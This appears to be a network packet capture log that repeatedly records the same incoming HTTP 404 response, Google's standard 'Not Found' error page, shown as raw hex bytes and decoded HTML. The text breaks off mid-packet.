Dec 1, 2024 22:52:11.333718061 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.333796024 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.521083117 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.521109104 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.621891975 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.621969938 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.722142935 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.722191095 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.822616100 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.822675943 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.922828913 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.922844887 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:12.023185968 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.023364067 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:12.123740911 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.123794079 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:12.224009037 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px 